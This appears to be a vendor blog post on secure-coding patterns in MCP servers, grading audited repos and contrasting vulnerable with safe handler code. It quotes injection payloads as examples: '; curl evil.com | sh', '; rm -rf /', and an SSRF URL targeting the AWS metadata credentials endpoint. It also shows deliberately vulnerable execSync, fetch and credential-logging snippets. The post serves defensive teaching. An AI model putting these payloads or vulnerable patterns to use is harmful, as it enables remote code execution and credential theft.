Engineering · 2026-04-30
Anatomy of an A-grade MCP server — five code patterns shared by the 19 that passed our 101-repo audit
Of the 101 community Model Context Protocol servers we audited in April 2026, exactly 19 earned an A and two earned a perfect 100. Reading their source side by side against the 42 F-grade repos and the 38 C-grade repos, the patterns that separate the A set are not heroic security engineering — they are five boring habits, repeated across language and framework choice. None of them are about what the MCP server does; all of them are about how its handlers are written. This post names the five, shows the bad-vs-good code shapes for each, and walks the two perfect-100 repos to explain what they do that the other seventeen A's don't. Companion to the F-grades post. If you are an indie author who wants the SkillAudit badge on your README this week, the checklist at the bottom is for you.
What "A" means under the SkillAudit rubric
SkillAudit grades every Model Context Protocol server (and Claude skill) on six axes — security, permissions, credentials, maintenance, compatibility, and documentation. Each axis is scored 0–100 against the published rubric. The overall grade is the floor of the worst axis, with security weighted as the gating axis: a security score of 70 caps overall grade at 70 regardless of any other axis. Letter buckets are A 90+, B 80–89, C 70–79, D 60–69, F < 60.
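The grading rule above can be sketched in a few lines. This is an illustration, not the engine's code: the names `AxisScores`, `overallScore`, and `letterGrade` are hypothetical, the example scores are made up, and the sketch assumes "floor of the worst axis" means the plain minimum across the six axes (which also reproduces the security cap described above).

```typescript
// Hypothetical names; the six axes and the letter buckets come from the rubric text.
type Axis =
  | "security"
  | "permissions"
  | "credentials"
  | "maintenance"
  | "compatibility"
  | "documentation";

type AxisScores = Record<Axis, number>;

const AXES: Axis[] = [
  "security",
  "permissions",
  "credentials",
  "maintenance",
  "compatibility",
  "documentation",
];

// Assumption: the overall score is the minimum of the six axis scores.
function overallScore(scores: AxisScores): number {
  return Math.min(...AXES.map((axis) => scores[axis]));
}

// Letter buckets as published: A 90+, B 80-89, C 70-79, D 60-69, F below 60.
function letterGrade(score: number): "A" | "B" | "C" | "D" | "F" {
  if (score >= 90) return "A";
  if (score >= 80) return "B";
  if (score >= 70) return "C";
  if (score >= 60) return "D";
  return "F";
}

// Made-up scores: a security axis at 70 holds the overall grade at C.
const example: AxisScores = {
  security: 70,
  permissions: 100,
  credentials: 100,
  maintenance: 95,
  compatibility: 100,
  documentation: 90,
};

const score = overallScore(example);
const grade = letterGrade(score);
console.log(score, grade);
```

Under this reading, no amount of polish on the other five axes can raise the overall grade above the weakest one.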
Earning an A requires two things simultaneously. First, every axis lands at 90 or above. Second, after the v0.3 calibration update — see the calibration delta post — no HIGH-severity finding lands on a production source path. Findings in tests/, examples/, benchmarks/, top-level scripts/, and .claude-plugin/install* code paths deduct at reduced weight (the surface-tier rubric documents how a path is classified), so a chatty test directory cannot tank an otherwise-clean MCP. But a single high-severity SSRF or command-exec on a runtime tool surface is sufficient to break out of the A bucket.
The asymmetry matters: an A grade is not a grade for absence of findings. It is a grade for absence of production high-severity findings, with low-severity warns tolerated. Microsoft Playwright (90/100) is the canonical example — it has two high-severity execSync findings, but both live in tests/cli.spec.ts and tests/library.spec.ts, which surface-tier as test code and deduct only −5 each. The MCP runtime itself does not do command execution, which is what the rubric is grading.
Across the 19 A's, the score distribution is:
| Repo | Stars | Days since push | Tier | Score |
|---|---|---|---|---|
| langchain-ai/langchain-mcp-adapters | 3,498 | 1 | Framework | 100 |
| vectara/vectara-mcp | 27 | 140 | Vector DB | 100 |
| microsoft/playwright-mcp | 31,354 | 1 | Browser | 90 |
| tadata-org/fastapi_mcp | 11,819 | 150 | Framework | 90 |
| mendableai/firecrawl-mcp-server | 6,127 | 1 | Web fetch | 90 |
| exa-labs/exa-mcp-server | 4,304 | 0 | Search | 90 |
| elevenlabs/elevenlabs-mcp | 1,328 | 34 | Voice | 90 |
| qdrant/mcp-server-qdrant | 1,363 | 23 | Vector DB | 90 |
| nickclyde/duckduckgo-mcp-server | 1,027 | 46 | Search | 90 |
| ClickHouse/mcp-clickhouse | 759 | 0 | Operational DB | 90 |
| zcaceres/fetch-mcp | 740 | 42 | Web fetch | 90 |
| redis/mcp-redis | 490 | 1 | Operational DB | 90 |
| Snowflake-Labs/snowflake-mcp | 276 | 11 | Operational DB | 90 |
| zilliztech/mcp-server-milvus | 229 | 121 | Vector DB | 90 |
| meilisearch/meilisearch-mcp | 185 | 105 | Search | 90 |
| box-community/mcp-server-box | 100 | 142 | Files | 90 |
| appwrite/mcp | 66 | 13 | Backend | 90 |
| pinecone-io/pinecone-mcp | 64 | 8 | Vector DB | 90 |
| Couchbase-Ecosystem/mcp-server-couchbase | 31 | 0 | Operational DB | 90 |
The star count, days-since-push, and tier dimensions are uncorrelated with the grade. A 27-star repo (Vectara) and an 11,819-star repo (FastAPI-MCP) sit on the same shortlist alongside Microsoft. What they share is not popularity or activity — it is a small set of code-shape decisions that the engine reads for. Below: those decisions, named.
Pattern 1 — No fetch(url) from a tool argument without an allowlist
What the engine looks for
The first SkillAudit security check walks every .js / .ts / .py file under production paths and looks for HTTP-client primitives — fetch, axios.get, axios.post, requests.get, urllib.request.urlopen, etc. — where the URL argument is a variable that traces back to the tool handler's input. The static analysis is a tree shape: function tool_handler(args) → some path → fetch(args.url) with no validation between them. If the engine cannot prove validation, it flags HIGH.
// punkpeye/fastmcp src/DiscoveryDocumentCache.ts:101 — F grade
async getDocument(url: string): Promise<Document> {
  const response = await fetch(url, { headers: { Accept: 'application/json' } });
  return response.json();
}
The url parameter is passed in from a tool handler. The host is not validated against an allowlist. An LLM tool call with url: "http://169.254.169.254/latest/meta-data/iam/security-credentials/" hits AWS instance metadata and exfiltrates the IAM role credentials in the response.
// exa-labs/exa-mcp-server — A grade
const exa = new Exa(apiKey);
const results = await exa.searchAndContents(query, {
  numResults: 5,
  text: true
});
The Exa MCP server does not call fetch with user-supplied URLs at all. The query argument flows into a typed SDK call that hits a single fixed host (api.exa.ai). The same shape covers Pinecone, Qdrant, Milvus, Vectara, Meilisearch, Redis, ClickHouse, Couchbase, Snowflake, Appwrite, Box, ElevenLabs, FireCrawl, and DuckDuckGo — every A-grade vendor SDK MCP. The vendor SDK is the allowlist: there is no code path inside the MCP that lets a tool argument become a fetch destination.
// zcaceres/fetch-mcp src/Fetcher.ts:64 — A grade (warn-level finding only)
const response = await fetch(url, {
headers: this.getHeaders(requestPayload),
});
// SkillAudit notes: validation markers present in surrounding code; flagged WARN, not HIGH.
The fetch-mcp repo is a web-fetch MCP — its job is to fetch user-supplied URLs. It cannot avoid the fetch(url) shape. What keeps it at A is the surrounding code: the engine identifies validation markers (URL parsing, hostname checks, redirect handling) close to the call site and downgrades the severity from HIGH to WARN. The deduction drops from −30 to −10, which still leaves the security axis at 90. The trust assumption is documented in the README — buyers know what they are installing.
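For authors who do have to fetch a caller-supplied URL, a hostname allowlist check placed directly in front of the call might look like the sketch below. It is not taken from fetch-mcp or any audited repo: `ALLOWED_HOSTS`, `assertAllowedUrl`, and `fetchAllowed` are hypothetical names, the hosts are placeholders, and whether the engine counts this as a validation marker is not something the sketch can promise.

```typescript
// Hypothetical allowlist; a real server would list the hosts it actually needs.
const ALLOWED_HOSTS = new Set(["api.example.com", "docs.example.com"]);

// Parses the raw string and throws unless the destination is acceptable.
function assertAllowedUrl(raw: string): URL {
  let url: URL;
  try {
    url = new URL(raw);
  } catch {
    throw new Error("url is not a valid absolute URL");
  }
  if (url.protocol !== "https:") {
    throw new Error("only https URLs are allowed");
  }
  // Reject userinfo tricks such as https://api.example.com@evil.test/
  if (url.username !== "" || url.password !== "") {
    throw new Error("URLs with embedded credentials are not allowed");
  }
  if (!ALLOWED_HOSTS.has(url.hostname)) {
    throw new Error(`host not on allowlist: ${url.hostname}`);
  }
  return url;
}

// Validation sits immediately before the network call.
async function fetchAllowed(raw: string): Promise<Response> {
  const url = assertAllowedUrl(raw);
  // redirect: "error" makes the request fail instead of following a redirect,
  // so an allowed host cannot bounce the request to a different destination.
  return fetch(url, { redirect: "error" });
}
```

With this in place, the metadata address quoted earlier fails twice over: it is plain http, and its host is not on the list. A fetcher that must reach arbitrary hosts cannot use a fixed allowlist and would need a denylist of private and link-local ranges instead, which is harder to get right.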
Pattern 2 — No exec / execSync / spawn shell:true with template-string argv
What the engine looks for
The second security check walks for child_process.exec, child_process.execSync, spawn(..., { shell: true }), os.system, and subprocess.run(..., shell=True) with a string argument that contains a template interpolation. If the interpolated value is a tool argument, it is shell-injection — an LLM tool call with filename: "; curl evil.com | sh" escapes the intended command boundary.
// modelcontextprotocol/inspector cli/scripts/make-executable.js — F grade
execSync(`chmod +x ${filePath}`);
The filePath variable comes from a CLI argument (which itself is passable from a tool handler in some downstream wrappers). Because the command is built as a template string, a value like "; rm -rf /" is concatenated into the command line before the shell parses it. The fix is one line: execFileSync('chmod', ['+x', filePath]).
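To see why the argv-array form closes the hole, the sketch below passes a hostile value through execFileSync and prints what the child process actually received. It runs the current Node binary rather than chmod so that it behaves the same on any platform; `echoArgv` and the sample filename are hypothetical.

```typescript
import { execFileSync } from "node:child_process";

// Starts the current Node binary and asks it to print the arguments it was given.
// execFileSync passes `args` as an argv array and does not start a shell by default.
function echoArgv(args: string[]): string[] {
  const script = "console.log(JSON.stringify(process.argv.slice(1)))";
  const out = execFileSync(process.execPath, ["-e", script, ...args], {
    encoding: "utf8",
  });
  return JSON.parse(out) as string[];
}

// A value that would terminate the command and start a second one
// if it were interpolated into a shell string.
const hostile = "notes.txt; echo injected";
const received = echoArgv([hostile]);
console.log(received);
```

The child sees the whole string as one argument, semicolon included, because no shell ever tokenises it. One caveat the argv form does not cover: a value that begins with `-` can still be read as an option by the target program, so many CLIs accept a `--` separator before positional arguments.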
// langchain-ai/langchain-mcp-adapters (A grade, perfect 100)
// No child_process imports. No subprocess imports.
// Tool calls are pure language-binding adapters: they translate
// MCP wire-format messages into LangChain tool invocations and back.
The simplest A-grade pattern is to never spawn a child process at all. LangChain MCP adapters, Vectara, Pinecone, Qdrant, Milvus, ClickHouse, Couchbase, Redis, Snowflake, Meilisearch, Appwrite, Box, Exa, FireCrawl, DuckDuckGo, ElevenLabs, fetch-mcp, and FastAPI-MCP all share this — none of them run shell commands. The MCP server is a thin protocol adapter over a vendor SDK or a network protocol; there is no shell-command surface to misuse.
Good: A-grade pattern (child process in tests only)
// microsoft/playwright-mcp tests/cli.spec.ts:23 (A grade despite finding)
const output = child_process.execSync(
  `node ${cliPath} install-browser --help`,
  { encoding: 'utf-8' }
);
Microsoft Playwright is the only A-grade repo where execSync with template-string argv exists in the source tree at all — and it is in two test files (tests/cli.spec.ts:23 and tests/library.spec.ts:27). Under v0.3 the test surface tier deducts −5 per HIGH finding instead of −30, so the two findings drop the security axis to 90, not below. The MCP runtime itself never spawns a child process. This is the surface-tier rubric working as intended: real findings counted at the right weight for their context.
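The surface-tier arithmetic quoted in this post can be written down as a small lookup. The sketch includes only the weights stated here (production HIGH −30, production WARN −10, test HIGH −5, examples WARN 0) and refuses to guess the rest; `Finding`, `DEDUCTIONS`, and `axisScore` are hypothetical names, and flooring the axis at 0 is an assumption.

```typescript
type Severity = "HIGH" | "WARN";
type Tier = "production" | "test" | "examples";

interface Finding {
  severity: Severity;
  tier: Tier;
}

// Only the weights quoted in this post; other combinations are left out
// rather than guessed.
const DEDUCTIONS: Record<string, number | undefined> = {
  "production:HIGH": 30,
  "production:WARN": 10,
  "test:HIGH": 5,
  "examples:WARN": 0,
};

// Starts an axis at 100 and subtracts the weight of each finding.
// Assumption: the axis score cannot go below 0.
function axisScore(findings: Finding[]): number {
  let score = 100;
  for (const finding of findings) {
    const key = `${finding.tier}:${finding.severity}`;
    const weight = DEDUCTIONS[key];
    if (weight === undefined) {
      throw new Error(`no weight quoted for ${key}`);
    }
    score -= weight;
  }
  return Math.max(0, score);
}

// Two HIGH findings in test files, as in the Playwright case.
const twoTestHighs = axisScore([
  { severity: "HIGH", tier: "test" },
  { severity: "HIGH", tier: "test" },
]);

// The same single finding on a runtime path.
const oneProductionHigh = axisScore([{ severity: "HIGH", tier: "production" }]);

console.log(twoTestHighs, oneProductionHigh);
```

The same finding costs six times as much on a runtime path as in a test file, which is the whole difference between staying at 90 and dropping to 70.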
Pattern 3 — Credentials read once at process start, never echoed
What the engine looks for
The credentials check walks for any code path where the result of an os.environ.get(...) / process.env.X / os.getenv("X") read flows into a string that ultimately becomes a tool response, an error message, a log line, or an exception body. The pattern catches both straight echoes (return res.status(500).send("Auth failed: " + token)) and indirect ones (logger.error({ apiKey }), where the structured-log writer serializes the whole object into a tool response).
// posthog/mcp typescript/src/api/client.ts — F grade
catch (error) {
  console.error(`API request failed: ${error.message}`, {
    apiKey: process.env.POSTHOG_API_KEY // echoed into structured log
  });
  throw error;
}
If the structured logger is wired to a transport that ends up in tool-response context — which is true for many MCP server frameworks where logs are forwarded as resource notifications — the API key leaks to the LLM client. From there it is one prompt-injection turn away from being exfiltrated to an attacker-controlled URL.
Good: A-grade pattern
// redis/mcp-redis (A grade)
const REDIS_URL = process.env.REDIS_URL;
if (!REDIS_URL) {
  throw new Error("REDIS_URL is required"); // no value echoed
}
const client = createClient({ url: REDIS_URL });
The A-grade pattern is to read the env var once at process start, validate that it is present, and pass it directly into the SDK constructor. The error path mentions the variable name but never the value. Every subsequent reference is to the connected client object, not the secret. Pinecone, Qdrant, Milvus, ClickHouse, Couchbase, Snowflake, Appwrite, Box, Exa, FireCrawl, DuckDuckGo, ElevenLabs, Meilisearch, fetch-mcp, FastAPI-MCP, LangChain MCP adapters, and Vectara all share this shape. The handler bodies do not have access to the API key string at all — they have access to a connected client.
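One way to make "handlers hold a client, not a secret" structural is to capture the key in a closure at startup. The sketch below is an assumption-laden illustration: `requireEnv`, `createClient`, `SearchClient`, and the variable name `EXAMPLE_API_KEY` are all hypothetical, and the client is a stand-in for a vendor SDK rather than any real one.

```typescript
type Env = Record<string, string | undefined>;

// Reads a required variable. The error names the variable, never its value.
function requireEnv(env: Env, name: string): string {
  const value = env[name];
  if (value === undefined || value === "") {
    throw new Error(`${name} is required`);
  }
  return value;
}

// Hypothetical stand-in for a vendor SDK client.
interface SearchClient {
  search(query: string): { query: string; authenticated: boolean };
}

// The key is captured by the closure and is not a property of the returned
// object, so serialising the client for a log line cannot include it.
function createClient(apiKey: string): SearchClient {
  return {
    search(query: string) {
      // A real client would send apiKey in a request header here.
      return { query, authenticated: apiKey.length > 0 };
    },
  };
}

// Read once at startup; handlers are given `client` only.
const env: Env = { EXAMPLE_API_KEY: "s3cret-value" };
const client = createClient(requireEnv(env, "EXAMPLE_API_KEY"));
const serialized = JSON.stringify(client);
console.log(serialized);
```

In a real server the first argument would be `process.env`. The point of the closure is that an accidental `logger.error({ client })` has nothing sensitive to serialise.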
The four A-grade repos that include an .env.example file (Vectara, Appwrite, ElevenLabs, Redis) get a low-weight WARN on credentials/examples surface. Because the surface tier is examples, the deduction is 0 — the warn is purely informational. The A grade is unaffected. The engine is reminding maintainers to verify the file is a template, not real secrets — but it is not punishing them for shipping one. The deduction matrix is documented in the methodology page.
Pattern 4 — Narrow tool surface
What the engine looks for
Every server.tool(name, schema, handler) registration (and the Python-decorator equivalent @app.tool(name)) is a public capability surface. Each tool is one entry in the JSON-RPC protocol that the LLM client can invoke. The permissions axis grades the shape of that surface: how many tools, how broad each one is, and whether any tool's argument schema includes free-form fields that could route to dangerous primitives.
Across the 19 A-grade repos, the median tool count is between 4 and 8. None of them ship more than ~12 tools. The tool names are narrow and verb-shaped: search, upsert, query, fetch_url, create_collection. None of them have a tool literally named execute, run, or shell — those names tend to indicate a privilege-escalation path the engine flags HIGH on the permissions axis.
// pinecone-io/pinecone-mcp — A grade
server.tool("describe-index-stats", { /* schema */ }, handler1);
server.tool("query", { /* schema */ }, handler2);
server.tool("upsert-records", { /* schema */ }, handler3);
server.tool("list-indexes", { /* schema */ }, handler4);
server.tool("create-index-for-model", { /* schema */ }, handler5);
// No tool argument is a free-form URL, file path, or shell command.
The Pinecone MCP exposes five tools. Each one maps cleanly onto a single Pinecone API call. Each schema is a typed object with named fields — index_name as a string with a regex constraint, top_k as a bounded integer, vector as a numeric array. None of them accept an unconstrained string that could become a URL or a shell argument. The blast radius of a tool call is bounded by the Pinecone API itself: an LLM tool call cannot do anything Pinecone's API does not let an authenticated user do.
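A hand-rolled version of that kind of schema, for a hypothetical query tool, might look like the sketch below. The field names follow the paragraph above, but the regex and the bounds (`INDEX_NAME`, `MAX_TOP_K`) are assumptions for illustration and are not Pinecone's actual limits; most servers would use a schema library rather than writing these checks by hand.

```typescript
interface QueryArgs {
  index_name: string;
  top_k: number;
  vector: number[];
}

// Assumed constraints for illustration; the real schema may differ.
const INDEX_NAME = /^[a-z0-9-]{1,45}$/;
const MAX_TOP_K = 100;
const ALLOWED_FIELDS = ["index_name", "top_k", "vector"];

// Validates untrusted tool arguments and returns a typed object, or throws.
function parseQueryArgs(input: unknown): QueryArgs {
  if (typeof input !== "object" || input === null) {
    throw new Error("arguments must be an object");
  }
  const raw = input as Record<string, unknown>;

  // Reject unknown fields so nothing free-form can ride along.
  for (const key of Object.keys(raw)) {
    if (ALLOWED_FIELDS.indexOf(key) === -1) {
      throw new Error(`unexpected field: ${key}`);
    }
  }

  const { index_name, top_k, vector } = raw;
  if (typeof index_name !== "string" || !INDEX_NAME.test(index_name)) {
    throw new Error("index_name must match the allowed pattern");
  }
  if (
    typeof top_k !== "number" ||
    !Number.isInteger(top_k) ||
    top_k < 1 ||
    top_k > MAX_TOP_K
  ) {
    throw new Error(`top_k must be an integer between 1 and ${MAX_TOP_K}`);
  }
  if (
    !Array.isArray(vector) ||
    vector.length === 0 ||
    !vector.every((v) => typeof v === "number" && Number.isFinite(v))
  ) {
    throw new Error("vector must be a non-empty array of finite numbers");
  }
  return { index_name, top_k, vector: vector as number[] };
}
```

Because the only string field is pinned to a short pattern, a value shaped like a URL or a shell fragment is rejected before the handler body runs.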
Compare to the F-grade pattern: a single execute or run_command tool with a free-form string argument. That one tool earns a high-severity permissions finding and a high-severity command-exec finding, which pull two axes below the A threshold at once. The resulting overall grade is at most C, and usually F.
Pattern 5 — Maintenance signal
What the engine looks for
The maintenance axis pulls metadata from the GitHub API on each scan: days since last push, open-issue count, archived flag, declared license. The compatibility axis reads package.json / pyproject.toml for declared engine versions and Node/Python compatibility ranges. The docs axis measures README size in bytes and looks for a SECURITY.md file.
The 19 A-grade repos all clear:
- Days since last push < 365, and in practice under 180. The stalest A-grade repo is FastAPI-MCP at 150 days; the freshest is Couchbase at 0 days. Above 365 days, the engine caps maintenance score at 40 (cannot earn A); above 180 days, it caps at 70 (likely C-or-below). Both caps are documented in the methodology meta-checks section.
- Declared engines field present. Every package.json in the A set declares an engines.node range; every pyproject.toml declares requires-python. Missing this caps the compatibility axis at 70.
- README ≥ 3 KB. A 3 KB README is roughly "install command, env vars, one usage example, license." Below that, the docs axis caps at 70.
- Low open-issue count for the repo size. The two A-grade repos with WARN-level open-issue findings are FireCrawl (104 open issues) and FastAPI-MCP (143 open issues) — both still A because the deduction is WARN on a single axis. Triage backlog is a soft signal of maintenance load, not a hard fail.
The single warn that 17 of 19 A-grade repos share is the same line item: (meta) — No SECURITY.md — no disclosure channel for vulnerabilities. It is a WARN on the docs axis, deducting 10 points to land at 90. The two perfect-100 repos (LangChain MCP adapters and Vectara) are the only ones where the docs axis finds nothing — and both ship a SECURITY.md.
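The caps and the SECURITY.md deduction listed above reduce to a few comparisons. The sketch below is a reading of the numbers in this section, not the engine's implementation: the function names are hypothetical, 3 KB is taken as 3 × 1024 bytes, and it assumes a cap and a deduction on the same axis combine by taking the lower value.

```typescript
// Maintenance: more than 365 days since push caps at 40, more than 180 caps at 70.
function maintenanceCap(daysSincePush: number): number {
  if (daysSincePush > 365) return 40;
  if (daysSincePush > 180) return 70;
  return 100;
}

// Compatibility: a missing engines / requires-python declaration caps at 70.
function compatibilityCap(hasEnginesField: boolean): number {
  return hasEnginesField ? 100 : 70;
}

// Docs: a README under 3 KB caps at 70; a missing SECURITY.md deducts 10.
// Assumption: 3 KB means 3 * 1024 bytes, and the lower of the two values wins.
function docsScore(readmeBytes: number, hasSecurityMd: boolean): number {
  const cap = readmeBytes >= 3 * 1024 ? 100 : 70;
  const afterDeduction = hasSecurityMd ? 100 : 90;
  return Math.min(cap, afterDeduction);
}

console.log(maintenanceCap(150), compatibilityCap(true), docsScore(4096, false));
```

For a repo pushed 150 days ago with declared engines and a 4 KB README but no SECURITY.md, this yields 100, 100, and 90, which matches the shape of most rows in the table.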
What the two perfect 100s actually do differently
Reading langchain-ai/langchain-mcp-adapters and vectara/vectara-mcp against the seventeen 90/100 repos, the difference is small and specific.
LangChain MCP adapters (100/100, zero findings, 3,498 stars, 1 day since push.) The repo is a pure protocol-adapter library — it converts MCP tool definitions into LangChain Tool objects and routes invocations through MCP StreamableHTTPClientTransport. The implementation has no fetch(url) with user input (the protocol layer below it handles all transport), no child-process calls, no environment-variable echoes (it does not read environment variables at all — the consumer of the library does), a narrow API surface, recent commits, declared engines, ample README, and a SECURITY.md at repo root pointing at LangChain's vulnerability-disclosure email. Every axis returns zero findings. The reason it is 100 is not that it does anything special — it is that it is small enough, focused enough, and well-maintained enough that there is nothing to flag. The lesson for authors: a clean axis is not the same as a complex axis with mitigations; sometimes it is just the absence of the bad pattern entirely.
Vectara (100/100, one low-weight warn, 27 stars, 140 days since push). Vectara is the more interesting case because it has fewer stars and a staler last push than most of the 90/100 repos. The single finding is (credentials/examples) on a .env.example file, a low-weight WARN with a 0-point deduction, which is why the score is 100, not 95. The repo ships a real SECURITY.md (no docs WARN), a parameterised query handler (no SSRF), no child-process calls, a narrow tool surface (search-and-rag verb-shaped tools only), an env-var read once at startup (no credential echo), declared engines, and a README ≥ 3 KB. At 140 days, the last push is inside the engine's 180-day soft cap and well inside the 365-day hard cap, so the maintenance axis stays at 100. The lesson: a small repo can earn a perfect 100 if it is correct end-to-end, and "correct" does not mean "lots of code"; it means "no bad patterns and a SECURITY.md".
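Both perfect-100 repos demonstrate the same point. Most of the 17 repos at 90 are not there because they did anything wrong on the security, credentials, or permissions axes; they are at 90 because they did not ship a vulnerability-disclosure file. Adding a SECURITY.md with a working disclosure email is approximately a 30-line task. For repos whose only finding is the missing file, that change alone would lift the score to 100 in the next re-scan; repos that also carry a deduction on another axis (fetch-mcp's security WARN, Playwright's two test-tier findings) would need to clear that as well.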
Why this list is short and boring on purpose
Reading down the patterns, the obvious response is that none of this is a security insight: it is the same advice OWASP, Snyk, and every code-review checklist have been giving for fifteen years. That is the point. The MCP supply chain has not invented new vulnerabilities; it has invented new surfaces for old vulnerabilities. SSRF in fetch(args.url) is the same SSRF as in a 2010 PHP file-upload form, but the URL now flows from an LLM tool call instead of an HTTP form field, so it is invisible to the DAST and CVE scanners that look for HTTP-shaped surfaces. Command injection in execSync(`chmod ${path}`) is the same command injection, but the path argument now comes from an LLM-generated tool invocation, so the threat model has changed even though the code shape has not. Credential echo is the same credential echo, but the structured-log line now ends up in a JSON-RPC tool response that an LLM client can attempt to exfiltrate via a follow-up tool call.
The reason the F-grade corpus is so much larger than the A-grade corpus is not that maintainers do not know these patterns. It is that the static analysis tools they normally rely on — Snyk, Dependabot, OSV-Scanner, GitHub Code Scanning's stock pack — do not fire on these patterns inside MCP tool handlers, because the standard taint-source list is "HTTP request body, query string, header" and not "function argument named args.url on a function that was registered via server.tool(...)." The vulnerabilities are not being introduced by careless code; they are being introduced by the absence of a scanner that recognises the new taint shape. SkillAudit is the scanner that closes that specific gap. The first 52-repo public scan documented the gap; the vendor-official F-grades post showed how it manifests on otherwise-reputable repos; this post documents what the other side of the gap looks like in code.
Author checklist — what to do if your audit comes back C or D
If you are an indie skill or MCP-server author and your SkillAudit grade is below A, walk this checklist. Most of the 38 C-grade repos in our corpus are one or two fixed findings plus a SECURITY.md away from B or A.
- Read your audit page top to bottom. Every finding has a file path, a line number, and a code snippet. Open the file. Look at the surrounding code. Decide whether the finding is real or a false positive — if real, fix it; if a false positive, leave a code comment explaining why (the engine is not adversarial, but the comment helps the maintainer who reads your audit page).
- Fix the production-tier HIGH findings first. They deduct −30 each and they cap your security or credentials axis. A single production-tier HIGH takes the axis to 70, which is below A regardless of everything else. The single finding moving you from C to A is usually a HIGH on production source.
- Decide if any fetch(url) calls really need to be there. If your MCP wraps a vendor SDK, the SDK should be doing the fetch; your handler should not. If you must fetch user-supplied URLs (you are a fetcher / browser MCP), document the trust assumption in the README and add an explicit hostname allowlist or SSRF-mitigation comment near the call site. The engine reads validation markers and will downgrade HIGH to WARN.
- Replace exec with execFile everywhere. If your code shells out at all, the argv-array form is one line away. execSync(`git log --since=${since}`) becomes execFileSync('git', ['log', `--since=${since}`]). The latter never passes through a shell, so shell metacharacters in the value have no effect. If you genuinely need shell features (pipes, redirects), wrap them in a constant string and pass user input through environment variables that the wrapped command reads.
- Audit your error and log paths for env-var echoes. Search your codebase for process.env / os.environ / os.getenv. Trace each result to its consumers. If any of those consumers reach a tool response, an exception body, or a structured log forwarded into the protocol, fix the path: log the variable name, not the value.
- Ship a SECURITY.md. 30 lines, repo root, naming a disclosure email and a coordinated-disclosure timeline. Lifts the docs axis from 90 to 100 on its own. If 17 of 19 A-grade repos in our corpus are missing this single file, you are unlikely to be different.
- Re-run the audit. SkillAudit is reproducible: every audit page links to the exact commit hash and runs the same engine version against any future commit. After your fixes are merged, request a re-scan; the new grade will reflect them.
Buyer checklist — how to read this list against your install decision
If you are a developer or team picking which MCP servers to install this week, the install shortlist covers the buyer-side use case at length. This post complements it with the why: the 19 are on the shortlist because they share the five patterns above. When you encounter a repo not in our 101-corpus, you can run the same five checks yourself in five minutes:
- Run grep -RnE 'fetch\(.*\)|axios\.(get|post)|requests\.(get|post)' src/ and ask: does the URL come from a tool argument? If yes, is there validation?
- Run grep -RnE 'exec\(|execSync\(|spawn\(.*shell.*true|os\.system|subprocess.*shell=True' src/ and look for hits in production paths. Look at each one.
- Run grep -RnE 'process\.env|os\.environ|os\.getenv' src/ and ask: which env vars are read, and do any of them flow into return paths or log lines?
- Read the server.tool(...) / @app.tool registrations. Is the tool surface narrow and verb-shaped, or is there an execute / run / shell in there?
- Check the README size, the most recent commit date, and whether a SECURITY.md exists.
If all five checks pass, the repo is plausibly A-grade and worth running through a real audit for confirmation. If two or more fail, do not install.
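The three grep-based checks can also be run in-process, for example from a pre-install script. The sketch below transcribes the patterns from the commands above into regular expressions and scans a string of source text; `CHECKS`, `scanSource`, and the sample lines are hypothetical, and like grep it only locates candidates. Deciding whether a hit is reachable from a tool argument is still a manual read.

```typescript
// Patterns transcribed from the grep commands above.
const CHECKS: { name: string; pattern: RegExp }[] = [
  {
    name: "http-call",
    pattern: /fetch\(.*\)|axios\.(get|post)|requests\.(get|post)/,
  },
  {
    name: "shell-exec",
    pattern: /exec\(|execSync\(|spawn\(.*shell.*true|os\.system|subprocess.*shell=True/,
  },
  {
    name: "env-read",
    pattern: /process\.env|os\.environ|os\.getenv/,
  },
];

interface Hit {
  check: string;
  line: number; // 1-based line number within the scanned text
  text: string;
}

// Returns one hit per (line, check) pair that matches.
function scanSource(source: string): Hit[] {
  const hits: Hit[] = [];
  source.split(/\r?\n/).forEach((text, index) => {
    for (const { name, pattern } of CHECKS) {
      if (pattern.test(text)) {
        hits.push({ check: name, line: index + 1, text: text.trim() });
      }
    }
  });
  return hits;
}

// Made-up sample input: three lines worth a look, one harmless line.
const sample = [
  "const key = process.env.API_KEY;",
  "execSync(`chmod +x ${filePath}`);",
  "const res = await fetch(args.url);",
  "const total = a + b;",
].join("\n");

const hits = scanSource(sample);
console.log(hits);
```

The remaining two checks (tool registrations and repo metadata) do not reduce to a pattern match and are quicker to do by eye.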
FAQ
If 17 of 19 A-grade repos are 90/100 because they lack a SECURITY.md, why isn't the docs axis weighted lower? Because the absence of a disclosure channel is a real maintenance gap, not a paperwork inconvenience. When a vulnerability is found in an MCP server and the discoverer cannot find a disclosure email, the most likely outcomes are public Twitter / X posts, GitHub issues with full reproduction steps, and CVE-grade exposure with no coordinated patch window. The 10-point deduction signals "the maintainer has not made it easy to be told about a problem"; it does not score the code itself. The two perfect-100 repos demonstrate that closing this gap is achievable.
Why doesn't this list include "use TLS" or "validate JSON schema"? Because every MCP server in the corpus already does both — they are protocol-level requirements of MCP itself, not author-discretion choices. The five patterns above are the ones that differ across the corpus; the protocol-mandated requirements are the floor, not the differentiator.
How does the list change if the LLM-assisted prompt-injection probe is enabled? The probe (Claude Haiku 4.5, gated on ANTHROPIC_API_KEY being set on the audit run) reads the first ~60 lines of each tool handler and asks specifically about untrusted-content flow into tool responses. None of the 19 A-grade repos have been probed in this scan because the API key was unavailable; we expect that of the 14 A-grade repos with no tool surface (vendor-SDK-only tools), most will continue to clear at A; of the 5 with active tool handlers (the web fetchers, the search APIs, FastAPI-MCP), some may pick up additional WARN findings on framing-marker absence. None should drop below B unless an unexpected pattern surfaces. We will publish the probe-enabled re-scan delta when the API key is configured.
Does an A grade today guarantee an A tomorrow? No. The audit is point-in-time on a specific commit. Maintenance changes, new tools added with broader argument schemas, regressions in error-path handling, all can drop a grade in a future scan. The right cadence is a 30-day re-scan, which is what the install-gate playbook codifies for team buyers. For authors: re-run SkillAudit before each release and treat a grade drop the same way you would treat a failing test.
What grade-bucket lift would each pattern produce on its own? Roughly: fixing one production-tier HIGH SSRF moves the security axis from 70 to 100 (single-handed C → A on that axis); replacing exec with execFile moves the security axis by the same amount; removing a credential echo moves the credentials axis from 70 to 100; narrowing a tool surface from "execute(cmd)" to a verb-shaped tool moves both the permissions and security axes; shipping a SECURITY.md moves the docs axis from 90 to 100. The overall grade is the floor of the worst axis (security-prioritised), so start with whichever axis is lowest on your audit page.
